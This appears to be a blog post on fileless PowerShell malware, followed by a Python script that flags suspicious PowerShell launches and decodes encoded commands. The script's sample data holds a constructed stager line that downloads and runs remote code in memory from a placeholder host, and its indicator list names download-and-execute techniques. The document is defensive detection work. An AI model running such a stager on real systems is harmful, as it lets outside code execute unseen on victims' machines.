Fileless Malware: The Advent of New Generation Malware — Some Dude Says
I previously wrote about another technique malware and ransomware authors were using to obfuscate their infections. Fileless malware is the natural evolution of this and is far scarier for file-based antivirus solutions. These infections have been making the news with Sodinokibi (also known as REvil), among others.
These attacks come from more recent exploits that let the attacker run whatever they want in memory without touching the disk at all (for the infection itself), as long as PowerShell works on the machine. They hit suddenly and efficiently, and most current traditional antivirus solutions miss them. The combination of zero-day exploits and heavily obfuscated launch methods means preventing them requires vigilance in every aspect of security, from patching to user education.
What Is Fileless Malware?
Fileless malware is malware that does not exist as a file on the disk. That is not to say a file cannot be involved (typically a batch file or other script kicks off the process), but the actual payload is not found in a file. These work by having a downloader that is impossible to identify as anything more than a simple downloader. This downloader drops a bit of PowerShell which then…
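Because the payload never lands on disk, a file scanner has nothing to hash; what a defender does have is the process-creation record for the PowerShell launch the downloader kicks off. The following Python script is an added example and is not part of the original post. It scores constructed process-creation records (the `image`, `parent` and `cmdline` fields are assumed names, modelled loosely on Sysmon event 1 / Windows 4688) for the launch flags and in-memory download-and-execute cmdlets that such stagers typically use, decodes any `-EncodedCommand` payload (PowerShell expects base64 of UTF-16LE) so the indicators are matched against the real script rather than the base64 blob, and adds a point when PowerShell was spawned by a script host such as `cmd.exe`. The weights and the threshold are assumptions for the example; the sample events and the hostname `example.invalid` are constructed.

```python
import base64
import re

# Weighted indicators (assumed weights for this example). Launch flags are weak on
# their own, since administrators use them too; in-memory download-and-execute
# cmdlets are the stronger signal, so they carry more weight.
INDICATORS = [
    (r"-(?:enc|encodedcommand|ec)\b", "encoded command", 1),
    (r"-(?:w|windowstyle)\s+hidden", "hidden window", 1),
    (r"-(?:nop|noprofile)\b", "no profile", 1),
    (r"-(?:ep|exec|executionpolicy)\s+bypass", "execution policy bypass", 1),
    (r"\biex\b|invoke-expression", "Invoke-Expression", 2),
    (r"downloadstring|downloaddata|downloadfile|invoke-webrequest|\biwr\b", "web download", 2),
    (r"net\.webclient", "WebClient object", 2),
    (r"frombase64string", "inline base64 decode", 2),
    (r"\[reflection\.assembly\]|\[system\.reflection\.assembly\]", "reflective assembly load", 2),
]

# Parents that match the "a batch file or other script kicks off the process" pattern.
SCRIPT_HOST_PARENTS = {"cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                       "winword.exe", "excel.exe", "outlook.exe"}

ENC_RE = re.compile(r"-(?:enc|encodedcommand|ec)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def to_encoded_command(script):
    """Build a -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded script if the command line carries an encoded command, else ''."""
    match = ENC_RE.search(cmdline)
    if not match:
        return ""
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""  # not valid base64/UTF-16LE: treat as nothing to decode


def analyze_event(event, threshold=3):
    """Score one process-creation record; 'suspicious' is True at or above the threshold."""
    cmd = event["cmdline"]
    decoded = decode_encoded_command(cmd)
    # Match indicators against the command line AND the decoded script, so encoding
    # the stager does not hide the cmdlets it uses.
    haystack = (cmd + "\n" + decoded).lower()
    hits, score = [], 0
    for pattern, label, weight in INDICATORS:
        if re.search(pattern, haystack):
            hits.append(label)
            score += weight
    parent = event.get("parent", "").lower().rsplit("\\", 1)[-1]
    if parent in SCRIPT_HOST_PARENTS and "powershell" in event["image"].lower():
        hits.append("launched by " + parent)
        score += 1
    return {"score": score, "hits": hits, "decoded": decoded, "suspicious": score >= threshold}


def suspicious_events(events, threshold=3):
    """Indices of the records that cross the threshold."""
    return [i for i, e in enumerate(events) if analyze_event(e, threshold)["suspicious"]]


PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample records: a scheduled backup, a benign encoded heartbeat, and a
# stager of the kind the article describes, launched from a batch file via cmd.exe.
STAGER = "Invoke-Expression ((New-Object Net.WebClient).DownloadString('http://example.invalid/stage'))"
SAMPLE_EVENTS = [
    {"image": PS_IMAGE, "parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1"},
    {"image": PS_IMAGE, "parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": "powershell.exe -NonInteractive -EncodedCommand "
                + to_encoded_command(r"Get-Date | Out-File C:\Temp\heartbeat.txt")},
    {"image": PS_IMAGE, "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass "
                "-EncodedCommand " + to_encoded_command(STAGER)},
]

if __name__ == "__main__":
    for i, event in enumerate(SAMPLE_EVENTS):
        result = analyze_event(event)
        flag = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"[{i}] {flag:10} score={result['score']:2} hits={result['hits']}")
        if result["decoded"]:
            print("     decoded:", result["decoded"])
```

Run on the three constructed records, only the last one crosses the threshold: the encoded heartbeat scores a single point for the encoding itself, which is the intended behaviour, since encoding alone is not evidence of anything. In a real deployment the same logic belongs on PowerShell script block logging (event 4104) as well, because a stager that is downloaded and invoked in memory never appears on a command line at all.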